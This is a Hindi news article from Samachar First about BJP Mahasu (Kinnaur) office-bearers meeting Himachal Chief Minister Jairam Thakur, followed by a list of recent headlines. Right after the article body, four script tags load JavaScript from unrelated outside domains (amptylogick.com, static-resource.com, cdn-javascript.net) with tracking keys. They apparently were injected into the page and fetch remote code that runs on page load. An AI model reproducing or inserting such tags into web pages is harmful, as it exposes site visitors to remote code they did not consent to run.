किन्नौरः भाजपा अध्यक्ष और पार्टी कार्यकर्ताओं ने मुख्यमंत्री से की मुलाकात

<p>भाजपा संगठनात्मक जिला महासु (किन्नौर) के नवनिर्वाचित मंडल अध्यक्ष अजय श्याम ने मंडल अध्यक्षों और संगठन कार्यकर्ताओं के साथ बीते कल मुख्यमंत्री से उनके आधिकारिक निवास &lsquo;ओक ओवर&rsquo; में भेंट की। मुख्यमंत्री ने इस अवसर पर संगठन के पदाधिकारियों और कार्यकर्ताओं को संबोधित करते हुए कहा कि शिमला जिला में भाजपा का जनाधार तेजी से बढ़ रहा है। पहले जहां भाजपा को कम आंका जाता था वहां लोक सभा चुनावों में पार्टी ने हर जगह बढ़त हासिल की। उन्होंने इस उपलब्धि के लिए पार्टी कार्यकर्ताओं को श्रेय देते हुए कहा कि प्रदेश के लोगों से मिल रहे भरपूर सहयोग के कारण ही प्रदेश सरकार ने अपने लगभग दो वर्ष के कार्यकाल में विकास की दिशा में मजबूती से अपने कदम उठाए हैं।</p>

<p>उन्होंने कहा कि प्रदेश सरकार सभी क्षेत्रों का संतुलित और तीव्र विकास कर रही है जिसके परिणाम सभी के सामने हैं। उन्होंने कहा कि इस कार्यकाल के दौरान सरकार ने विपक्ष को अपने खिलाफ कोई भी मुद्दा नहीं दिया है जिसके कारण विपक्ष के नेता बौखलाहट में हैं। मुख्यमंत्री ने पार्टी कार्यकर्ताओं को अभी से एकजुटता के साथ संगठन को और मजबूत बनाने का आह्वान किया ताकि आगामी विधानसभा चुनाव में भाजपा का प्रदर्शन और बेहतर हो। जयराम ठाकुर ने महासु जिला अध्यक्ष चुने जाने पर अजय श्याम को बधाई दी।</p>

<p>मुख्य सचेतक नरेंद्र बरागटा ने इस अवसर पर कहा कि मुख्यमंत्री ने शिमला जिला के सेब उत्पादकों की समस्याओं को समझा है और स्वयं एक बागवान होने के नाते उनके हितों के लिए कार्य कर रहे हैं। उन्होंने कहा कि शिमला जिला में भाजपा सुदृढ़ हुई है और शिमला नगर निगम, विधानसभा उप-चुनावों और लोक सभा चुनावों में महासू संगठनात्मक जिला ने महत्वूपर्ण योगदान दिया। चैपाल के विधायक बलवीर ठाकुर ने भी कार्यकर्ताओं को संबोधित किया और जिला के विकास को प्राथमिकता देने के लिए मुख्यमंत्री का आभार व्यक्त किया।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1575261232140″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Baba Siddique Murder Case: बोन टेस्ट में खुलासा, आरोपी धर्मराज कश्यप नाबालिग नहीं

Mumbai:  महाराष्ट्र के पूर्व मंत्री और राष्ट्रवादी कांग्रेस पार्टी (राकांपा) नेता बाबा सिद्दीकी की हत्या…

12 mins ago

16 अक्टूबर को मनाएं शरद पूर्णिमा, जानें पूजा विधि और व्रत के लाभ

Sharad Purnima Vrat 2024:  हिंदू धर्म में आश्विन मास की शुक्ल पक्ष की चतुर्दशी को…

22 mins ago

National : 10+2 पास युवाओं के लिए सेना में अफसर बनने का मौका, आवेदन शुरू

Indian Army TES 53 Recruitment: भारतीय सेना में अफसर बनने का सपना देखने वाले युवाओं…

33 mins ago

14 अक्टूबर 2024, जानें कैसा रहेगा सोमवार

मेष (Aries) आज का दिन आपके लिए लाभकारी रहेगा। बिजनेस में फायदे की संभावना है,…

47 mins ago

भारत में सड़क दुर्घटनाओं को रोकने के लिए केंद्रीय कानून जरूरी: शांता कुमार

Shanta Kumar road accident prevention: पूर्व मुख्यमंत्री और पूर्व केंद्रीय मंत्री शांता कुमार ने केंद्रीय…

12 hours ago

Himachal: सीएम सुक्खू ने ईवीएम पर उठाए सवाल, बैलेट पेपर से चुनाव की मांग

Ballot paper elections in India: हिमाचल प्रदेश के मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने देश…

13 hours ago